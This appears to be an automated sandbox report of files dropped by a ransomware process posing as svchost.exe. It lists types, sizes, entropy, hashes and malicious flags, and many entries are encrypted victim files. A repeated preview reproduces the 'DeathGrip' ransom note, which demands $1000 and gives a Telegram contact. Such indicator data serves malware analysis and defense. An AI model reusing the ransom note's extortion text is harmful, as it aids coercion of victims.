                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.128253055969964
                                                          Encrypted:false
                                                          SSDEEP:6:IKzWxiJ0+/K+DgpG9b6JD3RsAJG0pTtRugSULzK7LD8BfXldDfnxTDNCU7EGTjM5:ZIoy8gpr6AI0pTbRnGLoBNNnxTBz7XTm
                                                          MD5:24F585F2414C0A74BD8C1F00F1031F08
                                                          SHA1:C0BB7CCA173975591A53D03BE24C92D414CFEE71
                                                          SHA-256:CFF7D7D279CAC9DB3667F5B9DBC83604370E549AF96235BD9FB6B1835FC839E2
                                                          SHA-512:10E697EEC763EE5C0E96890B05C29A89B8FFA5E053C58A993E7837B83FBD80C110611BCE3725889D36D3A19FA95BA3599B4EA456599D4CA963DF7CF819EF87BB
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1048944
                                                          Entropy (8bit):7.999823446482509
                                                          Encrypted:true
                                                          SSDEEP:24576:4mZ72jO6oZ2E+F7yXSgZULgzP53ol4xWF:K5oZ2E+AXSgZU8zPhUn
                                                          MD5:658AAE0414CF36F2ADF2181A2004C028
                                                          SHA1:4ADC6F944B2C9DFAA6232365C0FC2A477638494E
                                                          SHA-256:872EECC3CB30F568B2A71E5FCC917A1FEA249BCF429374B353854196EAB3CB00
                                                          SHA-512:A95E9A6BE122E397A33750CCF4B1B783F9BD96FEB60CF492BA2EF6D6885D8B45A15206EC56FB4D36EC2C3AFE44883756CE9F013D725B926A017D1CA7517BA337
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):64304
                                                          Entropy (8bit):7.997452926420158
                                                          Encrypted:true
                                                          SSDEEP:1536:90pQwdOp99Dc2vYAY7XahR+iClFXwJuzcA8:90GAOp7HmXm+/FgyI
                                                          MD5:31233B276A4062612A55A509940F400A
                                                          SHA1:0BCED15F8C8A3C9765034977D20B5A76CE3568B0
                                                          SHA-256:FBC4075CFAB6B51D18AD5D0DD9C65D9BE7ADF958FC77D64ECA5E7D9BF3E31AB6
                                                          SHA-512:9A468189E8A2CB2359B7C37F84F1D42AD5F34D185BD86F7ADAD92D33C91652AAAE78BA91D94498E8D367528AEFAEE3643B1AF9F9AD5C64AAE6940595F80F77E1
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):524656
                                                          Entropy (8bit):7.999681556890541
                                                          Encrypted:true
                                                          SSDEEP:12288:/ccg4yHnXKBC6InAOF1o/wjp8oaKbBsH3HSlhzPWKzOb:/oEBC6UAW15jHaGsH3HIhyK0
                                                          MD5:002AA56693D85206E0C09AE823A56AD8
                                                          SHA1:DA03A92611A0ABEC4A64FD9F67E9DA02857B0885
                                                          SHA-256:B10D8020B3B6BC3F1D6BDC1819B2E6A293BA8D51F5EE1543FA491F25D20BAC5C
                                                          SHA-512:88464EB80048CA36F8F8139B07070B0D698C9F589B5FBE8EE537E57A9B14C83F2616E61CD18F1EBD36784233C500F08430E93E7F2979BE03B422ACB6D09668DE
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):524656
                                                          Entropy (8bit):7.999673832237816
                                                          Encrypted:true
                                                          SSDEEP:12288:mwJUiiBMLfa+DR8mHm/qI+OOEpyzixFbIt2SfPkKbJM:mwUiie7a+pEp8y58XkMM
                                                          MD5:4AAC250E9A7B9C254CCD789AED0FEB3F
                                                          SHA1:E37FBD33C068E9F2A43E0D42FCF2353E6F856F24
                                                          SHA-256:7E20D737FB2C7026A23E1BCF3F17867C5968CB31B51A09A9BE433CB989CB96A7
                                                          SHA-512:7DECFC49652426B11484D9D4E06D6E39C25BFF95B0D1A8E4110CD243D867C43D40CC41B64F396F90AA1C4DA7257D4D973F186DA4E6A44D9A9D7AC3E701E96E17
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1616
                                                          Entropy (8bit):7.799456846755807
                                                          Encrypted:false
                                                          SSDEEP:48:WigsCGjiry1T2O7OtT9sFNTnb0nMCy+dHoq6:WiJery1uyjrAnMRcoq6
                                                          MD5:613453BF8E471FE4BD8A57515BB5CEA3
                                                          SHA1:B1DA972D73034D17C4B5A2FE7624174FEDD0696B
                                                          SHA-256:42817917BEBC546862F6A58531CA56FF6DCF9E08A7C511D6016FEDECE556AC29
                                                          SHA-512:8D550B29CD40AB76502E8190B05463621D5D5FA0AB03A3D869C757966ED1EE770FA74E36191693F3B601D8D088DB84305A4D65178B02179D8F15274CAEBC5CD0
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):2046464
                                                          Entropy (8bit):7.999910825372939
                                                          Encrypted:true
                                                          SSDEEP:49152:nUgxbpNpub40xzcDmgQ/YsNdti0wKwQNcg7z6CVzoaBv4PzWEcoudeDZM:Lpe5oDXQtxi0wScg7zX8ahhUZM
                                                          MD5:5EA7F8706B1DB61A5A7415D0E5FE73EA
                                                          SHA1:9DB7BE02255F8217B6D7780DB35E20A4514667C8
                                                          SHA-256:C8B28D0DB53A351F0A83C0B0DDD11B172DCFD7BB72858D0A0F31F1000A032082
                                                          SHA-512:238166AD977090DC832439D9E31B5131128110F55FE9040CDC2FB201564A6AC9BDC2B194960ED48133424D0FB3C7AC78C7FD6DCBF826E2FC0B6B720FD78783E1
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3008
                                                          Entropy (8bit):7.916079589722619
                                                          Encrypted:false
                                                          SSDEEP:48:JYLxx4a2PX79YLL7AAUu1Og+YRY13GbmD6q5HWI3p5tnZXDjLg8SJiO9iNSa69hn:JYL34xKhU2bX3ID2SDd9DjnSJIw3TQs3
                                                          MD5:764EFA4ABBA2BADB2B55D479A96B916B
                                                          SHA1:C141221E88574902237C8E1A5EACAFA186950FFF
                                                          SHA-256:E06A6B42CBA25B4EA9DF1A80885055309D43B2DE5DFCF82222043DE92CA83C08
                                                          SHA-512:587D21032A1F83E163FEB125F78C6265EA9C94C435766F43C341BAE83BE73BC2B827CA70D60FE141B8CA75BF936C3B056BEF312165233CD2E2F2378625FA63A4
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):3760
                                                          Entropy (8bit):7.928336462469674
                                                          Encrypted:false
                                                          SSDEEP:96:639K4kDoPtr2L64gCk+8YS7Md5A28xU05:6QRgCL6tj76/UUu
                                                          MD5:230A0D1B2F1D57330CDBB185B78B440D
                                                          SHA1:461238BDFA2A5FE86E7B4B4CDBA4BAA23328F784
                                                          SHA-256:0AE5D1DC206C92BB32FA5BB12A02456D333087B1BC663FA5947EE1B98782403B
                                                          SHA-512:1646D651784D1E1F23198CC927A38558AAFE28D43C9333442D78548F9F1E5F0EC0CA27852D36576F90E733A818D454987A9132C67ED7A21A6BAC53F460CA3EF8
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):470
                                                          Entropy (8bit):4.6966693482751545
                                                          Encrypted:false
                                                          SSDEEP:6:6mCdVIIFKIlLMBgaIsEbsrIuQT9VH3RIG6hoNr4g7F8JqNByldQ2WbvF7HeIgAHz:WKceUsrIpRIBhGcgBold0bvJMcKqLv
                                                          MD5:8D343BF17EF14ED4108D2DB0F866100A
                                                          SHA1:C40E7C3D21224852317C9FAA94FB9491798AFE64
                                                          SHA-256:FF6234D40F59879BFB8CBC051303E5C40B7FAAB945A8B867937146CF693032A3
                                                          SHA-512:5EF8D0A32C7B00393F9CCEC32EC5B65532C0CB15F7F03BD93920FE74D365A4805DA55B26BC0C6ED56B96A47A1C186A673147CB67539A6E907E82416B331E9303
                                                          Malicious:false
                                                          Preview:DeathGrip Ransomware Attack | t.me/DeathGripRansomware....This computer is attacked by russian ransomware community of professional black hat hackers. ..Your every single documents / details is now under observation of those hackers...If you want to get it back then you have to pay 1000$ for it.....This Attack Is Done By Team RansomVerse You Can Find Us On Telegram.. @DeathGripRansomware Contact The Owner For The Decrypter Of This Ransomware....#DeathGripMalware..
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1426256
                                                          Entropy (8bit):7.999859935701533
                                                          Encrypted:true
                                                          SSDEEP:24576:0UYRf/zWb6rlNtS3oiVsVEBFIxVJxM0qT7iOI1zMMoGQsyPUi/WZ2k7BD3Pbvy4u:skXVSEBus0y7zUMVGQfcXhRfu
                                                          MD5:6A731AA0C5BFF6C2FFD6F8809C054643
                                                          SHA1:C3E0BD9CAD028DFEAEB2567D95B98E8554626761
                                                          SHA-256:A613CC2C8C50BB386C4F7FDD0EBADF401F7640856E859C81A4AA433C74AD0B7F
                                                          SHA-512:C6D0B9E8406C7690429EAEB98631F45DB0B472BB3F89CEBA4F427A869D09EBB94C24F66F47D3DEABCF012637C6B5F55DCA3F4FF4EFED68862321B7B15A659EE7
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):352096
                                                          Entropy (8bit):7.99944515345235
                                                          Encrypted:true
                                                          SSDEEP:6144:e+CSvcQgm4ZCGW/mRS7WxiLev1wChF6PyRbPImwL6CZX+FwZni:ef4cQgm4ONWWI1wChFftAmwL6AX+FwZi
                                                          MD5:ADCB1CA9BC75660BF20B7A32E687161B
                                                          SHA1:B1FD13A1D91FF68B8FBBA4B86E82BEFCA02E0183
                                                          SHA-256:A1060CB9714B1E88D452470841C6F30441182A1FBC1DABE9349A8D16E87DAA24
                                                          SHA-512:89C0496877A89D374087299C62BA77AB8AE8B29EE6C325DEC3E7F31573403BDB8ADA55976EB2257FB61B3F9AAC5C3F00BB0A243E93A630BE586B6D2F00F1F6C1
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):243856
                                                          Entropy (8bit):7.999287890509857
                                                          Encrypted:true
                                                          SSDEEP:6144:GJZZo2CJx22VxsBZcNFdNrsmA8nPz6JYKDYz3gNeEtfAJU:akC2gBZcNNA8nP7KDI+RfAW
                                                          MD5:708F5E99A893A3B5583DAD3D8055E9C1
                                                          SHA1:D224308BBA4B3474383D9F253306DB6996E07C91
                                                          SHA-256:D983275DF82A9382D2592CA288B326E3C8D9D27438292EC5E5B307960C6E449E
                                                          SHA-512:C62CB3BCA2145A947FC296EE87EA90B80A9A45A4979D0DFD350ADC9E1701CD5CC71D0E169ACAEBABAB72D00595FF1F586B11A39458C2CC14478592F6A0135FD5
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):533104
                                                          Entropy (8bit):7.9996246409445
                                                          Encrypted:true
                                                          SSDEEP:12288:ZD/PW/AuUsLLOMoJiEuO7NZXJKC3vXrdGdq45pn:ZDW/AYLOMkiNOxZXJKCfbM
                                                          MD5:6D4B3CEE853EB7674B19DE8E1BDEDB73
                                                          SHA1:EEA1182B4E7A6C0D03EAA0F8660708F61530C753
                                                          SHA-256:40D3144CD96464822E12B54F7A1EF29939B81E5DD47CC431192ED0A226366AC5
                                                          SHA-512:AC5B4C03BC76914911F8D7D0C3C726176ACD4B78BA89EA5A78FF214EF8ECB85A677D0F23C3C95B3629AB1CA557690083E18B4E968F8174F0707E953EBF56927B
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:very short file (no magic)
                                                          Category:dropped
                                                          Size (bytes):1
                                                          Entropy (8bit):0.0
                                                          Encrypted:false
                                                          SSDEEP:3:a:a
                                                          MD5:D1457B72C3FB323A2671125AEF3EAB5D
                                                          SHA1:5BAB61EB53176449E25C2C82F172B82CB13FFB9D
                                                          SHA-256:8A8DE823D5ED3E12746A62EF169BCF372BE0CA44F0A1236ABC35DF05D96928E1
                                                          SHA-512:CA63C07AD35D8C9FB0C92D6146759B122D4EC5D3F67EBE2F30DDB69F9E6C9FD3BF31A5E408B08F1D4D9CD68120CCED9E57F010BEF3CDE97653FED5470DA7D1A0
                                                          Malicious:false
                                                          Preview:?
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):44864
                                                          Entropy (8bit):7.995469226171539
                                                          Encrypted:true
                                                          SSDEEP:768:xJuLhLOXTJifAxmd4Mgpwv2cr28i/3TJzs/+HPH7l2qXim1Dx+ehPqG:2LIXTGMP1yXRi/Txs/SPbwqymtlhF
                                                          MD5:007B4E18AE82E1BC2C082A85B8C02EB3
                                                          SHA1:450BBEA4179764D497D99A409F92E28D0ABF3656
                                                          SHA-256:CB4240E3206229412E9130676714CF5F4C2CEB554EC8B06EC024B54CD1465C01
                                                          SHA-512:A6CB8B611019205D915ACE9E1CE19A4750438789D103ECCE77DC651B5D287B1F4BE21E77A9BC4D3D7A2A33AABA41473F94D8089EE78F6A73359F4C2F50597872
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):104080
                                                          Entropy (8bit):7.99807190347203
                                                          Encrypted:true
                                                          SSDEEP:1536:QnY/vTQQGzwB5/WdSDf4OizYVk4jhfR1NFkLjOeM9U4PISCZPan121kS:QnkTeq/WdSDf4jmVjhp1NFWjOEZCnOkS
                                                          MD5:721AE8640134719AF69E699A9488E546
                                                          SHA1:45487367B85896379317C0D4896ED0FE01DFEA64
                                                          SHA-256:4DD3B3AF791B2632FF319B91A1398311AD05F21674EF4BEA997E84DE7EE49187
                                                          SHA-512:D98708E002C993FA329E54CB12C0E24A8FCAD91E8EFC36ED3BDAEE23F7AC839A3B3735C0DE2ECF44C79B06F28D879E352B94B77545CEBCDAD08673C885DE5D0F
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):217872
                                                          Entropy (8bit):7.999146933616393
                                                          Encrypted:true
                                                          SSDEEP:3072:RdNwZ4m1piOhNN+oW89gyrIx6QDa/5gxPxZvvcqWKQeWvF4p+O8xhSKJuas21:RUum1piOJ+oXgkx5g5xZQKdCWs
                                                          MD5:8BF90A300CEB2FC2992790D42074CFBF
                                                          SHA1:8FB0EF901BEE53328DE79804566B480AA784F860
                                                          SHA-256:6A5B17CDC8E1677FEB25467537840E900F1CC54D6E4F64C7986F302B88AE2EC1
                                                          SHA-512:94BC5ACA181C3DDDDE7FDC86C5818D833B9A495BFAD824FDAD9A20E151B96871EDCAA1C98D7DB607EF9B41E018140D389EB1DEC3E03FD454F59D25BEC2F49A28
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.108473620748518
                                                          Encrypted:false
                                                          SSDEEP:6:9mpK4fcVEGSmTqW86C7inR/p/+drXGTGvNCyhWhGVSGiWgkxVRN3asXvFVa6yRk2:kpKkGSmTLDIML8kyhWh0gkxV3T9V869W
                                                          MD5:6C47614A55AB6BCFEEA74DF15449F4C8
                                                          SHA1:5D379095F6DBCFB5543F82513229CE9618A06CD4
                                                          SHA-256:8B4506708050B53E18CD472E5E7BDF83039085F47562D839518F8321608FD616
                                                          SHA-512:ECD27D99CA9544532F39437AC3FD07EF922D690F7EFED9065C621A008B3C0B5925A67DD87EC36F5CE8989AD7E42E506B5AE5F0095241E2FA7127748F4AC8AAF6
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.111849914517111
                                                          Encrypted:false
                                                          SSDEEP:6:nanOg0aBvAq5eo5W0yLGvF5dIAym+BTkSAAC82bTHmnYXM8OWmhK:na1BvAq54y1z+IS7CV/3f
                                                          MD5:24C6B3063D1D8FDDD0C1E2CF7B7619B0
                                                          SHA1:4BC638A0A4299D022D490BCF49759981DA7A65EA
                                                          SHA-256:DBE54395BEC9D56044CA1085FCFE53692288C1C376EA67B57EE2715D203E36B9
                                                          SHA-512:863CC11BB99CAAAECFB0165709F5E1C80A0FCEAF4D0B829C7E8422B439E08EA4F7CDC269131ADD9A013A82932B6096C6967CCE1537195782317D2974EE57D4D7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8
                                                          Entropy (8bit):3.0
                                                          Encrypted:false
                                                          SSDEEP:3:/:/
                                                          MD5:0EE0646C1C77D8131CC8F4EE65C7673B
                                                          SHA1:DD5783BCF1E9002BC00AD5B83A95ED6E4EBB4AD5
                                                          SHA-256:66840DDA154E8A113C31DD0AD32F7F3A366A80E8136979D8F5A101D3D29D6F72
                                                          SHA-512:1818CC2ACD207880A07AFC360FD0DA87E51CCF17E7C604C4EB16BE5788322724C298E1FCC66EB293926993141EF0863C09EDA383188CF5DF49B910AACAC17EC5
                                                          Malicious:false
                                                          Preview:........
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.093913420909707
                                                          Encrypted:false
                                                          SSDEEP:6:EC7KJgMfOONWpvS01MSHVjJRFwx/LQ0uMePPgiwGptkCYMXUxXMf6TbMAqsq/Gxr:jKvOOEpFddfQLQ0uvPgiHztXQBTB+G4Q
                                                          MD5:5BA60725AB93E24CF4F9CDE3A63D989E
                                                          SHA1:622933F8967EB9DCBA415EBAF804EB3B67938807
                                                          SHA-256:6EFD4564CA165F561C4E0AD52D614A7187A7545199256AE713A07E21B7AEC0FA
                                                          SHA-512:20AC0AFD354379B2A2AF5146C418BA864559109D509A4E494111F23B501D95136B720714DA89C413268E950F6F067A9BDFBF3B03A7CB0D00D5B9D77953F31A25
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):368
                                                          Entropy (8bit):6.089253307631718
                                                          Encrypted:false
                                                          SSDEEP:6:uDGPI2XtOpEvT+44fOmjG3U80OJBHSKlF3XABnnXeyzueP9L6/fARMjOUn1:ug92EvTL4fOmS3UaJZ5lF3XAVXekuk8v
                                                          MD5:37F5E3C9DED162409DC2756311FEA0F5
                                                          SHA1:86212BC45948E5C664AEC33FF3493828A158DEB9
                                                          SHA-256:7EF90C354123B5DFA7B6DB1B0968FE5036C1CE7413F9B4F1845D3F11AAE1E034
                                                          SHA-512:D800E5A9098985783CDF7847BD49D52B90E5A249CE833CC676DC7E524DB50301CE84B03CA1FCD96902C889085227B9021A2209F02AC06684B994C3535985E1E7
                                                          Malicious:false
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):149056
                                                          Entropy (8bit):7.998783179425257
                                                          Encrypted:true
                                                          SSDEEP:3072:iTBowwqOT1uk0U+QL1cA/6qu/Jv1nGxF6Y4BLXPnp/belw7cIHJ3po3G:GBU7L1cACqu/JJvLXPnNeOcs9F
                                                          MD5:C9D31107262A3EED0B50ACD050AA18B8
                                                          SHA1:6B3411A12A49DE128ABDCB385C8641BEADAA64BA
                                                          SHA-256:BF46E3799466F727EF05F5A9F1B8B4A4D6B10D125A1FCFEEAE12624346E69E2C
                                                          SHA-512:5B623C3860EE037EA6EDC088F7E10C69C6D61701FDDB9FB5F860F02EA8349169BCBD469D68C7F43872E2AD687577A4B149A7ED332B2EC267AB9CB9EC786EF72D
                                                          Malicious:true
                                                          Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):8560
                                                          Entropy (8bit):7.97813356935928
                                                          Encrypted:false
                                                          SSDEEP:192:gJb4aSEwIG2rBVr5SjEZxVLTXTvJoBx8rinn6EI57G0Qz5+n8WJjaM:g91yIycLTXTvax8rG6LG0Q1+8WkM
                                                          MD5:CB65FFDC3D4C9BAA7EBACBEC89E426D2
